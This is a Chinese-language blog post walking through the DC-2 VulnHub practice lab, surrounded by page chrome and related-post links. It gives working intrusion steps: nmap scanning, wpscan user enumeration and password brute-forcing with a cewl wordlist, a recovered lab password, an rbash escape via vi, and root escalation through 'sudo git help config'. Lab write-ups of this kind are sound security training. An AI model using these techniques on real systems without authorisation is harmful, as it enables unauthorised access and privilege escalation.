DC-2 vulnhub靶场

最新推荐文章于 2024-07-19 14:26:50 发布
最新推荐文章于 2024-07-19 14:26:50 发布
阅读量86 收藏
点赞数
分类专栏: Vulnhub 文章标签: 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62621015/article/details/129215643
版权

目标是找到5个flag
需要得到root权限
kali和靶机都需要设置为NAT模式

nmap -sP 192.168.181.1/24 主机发现

nmap -p 1-65535 -A 192.168.181.136 端口扫描

在这里插入图片描述

访问一下http://192.168.181.136,发现URL栏写的不是靶机的ip,而是http://dc-2/,而很明显,DNS没有解析出来

在windows host文件添加 192.168.181.136 dc-2
将域名指向我们的ip

kali靶机中也要添加,后面有用(etc/hosts)

在这里插入图片描述

发现flag1,提示使用cewl,以及cms是wordpress

wpscan --url http://dc-2  -e u

在这里插入图片描述

建立用户字典dc2_users.txt

在这里插入图片描述

dirb http://dc-2 目录扫描

在这里插入图片描述

在这里插入图片描述

需要密码,使用cewl生成密码

cewl -w pass.txt http://dc-2

在这里插入图片描述

使用wpscan爆破

wpscan --url http://dc-2 -U dc2_users.txt -P pass.txt

在这里插入图片描述

parturient adipiscing

登陆之后到处找找,我的wordpress点不进去,不知道为啥,找的别人的图

在这里插入图片描述

告诉我们wordpress不能用了,换个切入点

我们上面还发现了ssh服务,试试ssh连接

在这里插入图片描述

compgen -c #查看可以使用的指令

在这里插入图片描述

在这里插入图片描述

意思是要切换成jerry用户

rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
怎么做可以绕过shell限制?

vi 
:set shell=/bin/sh
:shell

在这里插入图片描述

添加路径

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

在这里插入图片描述

提示git提权(前提是执行sudo -l 提示不需要密码可以使用git命令)

sudo git help config #在末行命令模式输入
!/bin/bash 或 !'sh' #完成提权

在这里插入图片描述

川川小宝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-5--vulnhub靶场
m0_46982383的博客
07-22 315
对文件包含漏洞运用、FUZZ、服务器日志利用、searchsploit的EXP利用
Vulnhub靶场 DC系列 DC-2靶场
sdfsergfr的博客
12-12 700
Vulnhub靶场 DC系列 DC-2靶场
DC-9 vulnhub靶场详细通关记录
weixin_62621015的博客
03-03 346
vulnhub靶场 DC-9个人通关记录 补充了很多细节和知识点,可以参考一下
vulnhub靶场DC-3
qq_58091216的博客
01-08 1225
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 1553
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2495
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulnhub靶场DC-2
qq_58091216的博客
01-07 1006
1)我们使用ssh登录账号,用jerry登录半天登录不上去,我们使用tom进行登录,发现可以登录成功,而且看到了flag3.txt。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权。虚拟机开启之后界面如下(和1一样),我们不知道ip,需要自己探活,网段知道:192.168.52.0/24。与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。添加完成之后,再次访问,访问成功(我们使用kali里面的浏览器)
DC-6 vulnhub靶场
weixin_62621015的博客
02-27 130
DC-6 vulnhub靶场个人通关记录 ;
Vulnhub靶场----9、DC-9
七天
03-03 740
Vulnhub-DC9
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
WebRTC通话原理(SDP、STUN、 TURN、 信令服务器
最新发布
weixin_46999174的博客
07-19 1196
本文主要讲述了WebRTC点对点的通信原理,其中包括媒体协商,点对点打洞,服务器转发,信令交换服务器的工作流程
MacBook电脑远程连接Linux系统的服务器方法
H66778899的博客
07-17 432
Windows 操作系统的电脑可使用Xshell等功能强大的远程连接软件。通过连接软件,用户可以在一台电脑上访问并控制另一台远程计算机。这对于远程技术支持、远程办公等场景非常有用。但是MacBook电脑的macOS无法使用Xshell。在Mac上远程连接到Windows服务器,可以使用 Royal TSX,其是一款功能强大的远程桌面和终端服务管理软件,适用于 macOS 系统。它可以帮助用户连接和管理远程桌面、终端、SSH、Telnet、VNC 和其他远程连接。
cmake configure_package_config_file指令详解
qq_37805392的博客
07-18 524
在 CMake 中,configure_package_config_file 命令用于生成包配置文件(Package Configuration File),这些文件用于指定如何使用和链接某个库或工具。在这个示例中,configure_package_config_file 命令会根据 MyLibConfig.cmake.in 文件生成实际的 MyLibConfig.cmake 文件,将路径变量 ${CMAKE_INSTALL_PREFIX} 替换为实际的安装路径,然后安装到指定的路径中。
Linux】`mkdir` 命令详解:从基础使用到高级技巧
lph159的博客
07-18 852
mkdir是 “make directory” 的缩写,用于创建新的目录。无论你是新手还是经验丰富的 Linux 用户,mkdir都是你日常操作中不可或缺的工具之一。它不仅简单易用,而且功能强大,能够满足从基础到复杂的各种需求。mkdirmkdir [选项] 目录名例如,创建一个名为example这样就会在当前路径下创建一个名为example的新目录。
VulnHub入门教程:DC-1靶场攻破指南
"DC-1 是一个专门为渗透测试学习设计的漏洞靶场,由 ins1ght 作者提供,适合初级者。靶机于2019年2月28日发布,包含五个旗标,最终目标是找到并读取 root 用户主目录中的旗标,可能需要具备 Linux 技能、熟悉 Linux ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值